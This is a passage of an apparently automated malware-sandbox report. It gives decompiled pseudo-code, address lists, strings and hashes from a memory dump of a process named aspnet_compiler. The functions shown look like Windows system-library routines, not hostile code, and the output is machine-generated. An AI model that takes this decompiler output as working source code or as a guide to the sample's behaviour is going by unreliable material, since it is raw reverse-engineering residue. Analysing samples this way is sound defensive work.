							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0111A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L010F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x010e1b8f
0x010e1b9a
0x010e1b9c
0x010e1b9e
0x010e1ba3
0x01137010
0x01137010
0x00000000
0x010e1ba9
0x010e1ba9
0x010e1bae
0x00000000
0x010e1bc5
0x010e1bca
0x010e1bcf
0x010e1bd0
0x010e1bd1
0x010e1bd2
0x010e1bd6
0x010e1bdc
0x010e1be0
0x01136ffc
0x01137000
0x00000000
0x01137006
0x01137009
0x01137009
0x010e1be6
0x010e1bec
0x010e1c0b
0x010e1c0b
0x010e1c0c
0x010e1c11
0x010e1c12
0x010e1c15
0x010e1c1b
0x010e1c1f
0x010e1c31
0x010e1c33
0x01137026
0x01137026
0x010e1c21
0x010e1c24
0x010e1c24
0x010e1bee
0x010e1bee
0x010e1bf2
0x010e1c3a
0x010e1bf4
0x010e1bf4
0x010e1c05
0x010e1c05
0x010e1c09
0x010e1c3e
0x00000000
0x00000000
0x00000000
0x010e1c09
0x010e1bec
0x010e1be0
0x010e1bae
0x010e1c2e

Strings

WindowsExcludedProcs, xrefs: 010E1BC5

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 9c4b13f423b93f2d8b1578f393cd735ea0c838e5643e41c216b996ddf4d7da5d
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: F021377A50162CAFDB229A5AC944F9FBBEDEF85610F054065FE54CB204D730DD10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 010FF716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x010ff71d
0x010ff722
0x010ff726
0x01144770
0x010ff765
0x010ff769
0x010ff769
0x010ff732
0x0114477a
0x00000000
0x0114477a
0x010ff738
0x010ff73a
0x010ff73c
0x010ff73f
0x010ff746
0x010ff778
0x010ff7a9
0x010ff7a9
0x010ff754
0x010ff75a
0x010ff75d
0x010ff75f
0x010ff761
0x010ff76f
0x010ff771
0x010ff771
0x010ff76f
0x010ff763
0x00000000
0x010ff763
0x010ff77d
0x010ff7a3
0x010ff7a5
0x00000000
0x010ff7a5
0x010ff77f
0x010ff782
0x010ff784
0x010ff786
0x00000000
0x00000000
0x00000000
0x010ff788
0x010ff748
0x010ff74d
0x010ff78d
0x010ff793
0x010ff7b7
0x010ff7bc
0x00000000
0x010ff7bc
0x010ff798
0x00000000
0x00000000
0x010ff79d
0x010ff7b0
0x00000000
0x010ff7b0
0x010ff79f
0x00000000
0x010ff74f
0x010ff74f
0x00000000
0x010ff74f

Strings

Actx , xrefs: 010FF73F

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 88af4e080633162b23baea993896f94d9f8b5bab641ca4759335410d63ea9896
Instruction ID: 25ebd70f6614e39295aa105f2eff22b8ade5d6ab19e18886d78d551e36c0f44e
Opcode Fuzzy Hash: 88af4e080633162b23baea993896f94d9f8b5bab641ca4759335410d63ea9896
Instruction Fuzzy Hash: 0311E637304B038BE7644E1D849273AF6D5BB85664F28456EE7E1DBFA1DB74D8018340

Uniqueness

Uniqueness Score: -1.00%

Function 01188DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01188DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x11b0d50);
				E0112D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01165720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E0112DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E0112DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0112D130(_t34, _t39, _t40);
			}

0x01188df1
0x01188df1
0x01188df1
0x01188df1
0x01188df1
0x01188df1
0x01188df3
0x01188df8
0x01188dfd
0x01188e00
0x01188e0e
0x01188e2a
0x01188e36
0x01188e38
0x01188e3c
0x01188e46
0x01188e46
0x01188e36
0x01188e50
0x01188e56
0x01188e59
0x01188e5c
0x01188e60
0x01188e67
0x01188e6d
0x01188e73
0x01188e74
0x01188eb1
0x01188ebd

Strings

Critical error detected %lx, xrefs: 01188E21

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: b4ae9455f436b8d4e1227b9ffc1f4d9076cbd24236c70e2669fab17429313da0
Instruction ID: ea40f8f16c973d1b48790abda64f6e1d6bfa21a5f3a32f5cfc313e945ce2d18a
Opcode Fuzzy Hash: b4ae9455f436b8d4e1227b9ffc1f4d9076cbd24236c70e2669fab17429313da0
Instruction Fuzzy Hash: AD117571D10358DBDF2CDFA8D50579CBBB0AB14314F20826EE168AB2C2C3340602CF14

Uniqueness

Uniqueness Score: -1.00%

Function 011A5BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E011A5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x11b1178);
				E0112D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E011A4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0111D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E011A5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x11c60e8;
								if( *0x11c60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x11c60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01119710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01116DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0111F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0111F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0111F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0111FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0111FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0111F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0111F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E011A4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0112D130(_t427, _t494, _t511);
				}
			}

0x011a5ba5
0x011a5baa
0x011a5baf
0x011a5bb4
0x011a5bb6
0x011a5bbc
0x011a5bbe
0x011a5bc4
0x011a5bcd
0x011a5bd3
0x011a5bd6
0x011a5bdc
0x011a5be0
0x011a5be3
0x011a5beb
0x011a5bf2
0x011a5bf8
0x011a5bfe
0x011a5c04
0x011a5c0e
0x011a5c18
0x011a5c1f
0x011a5c25
0x011a5c2a
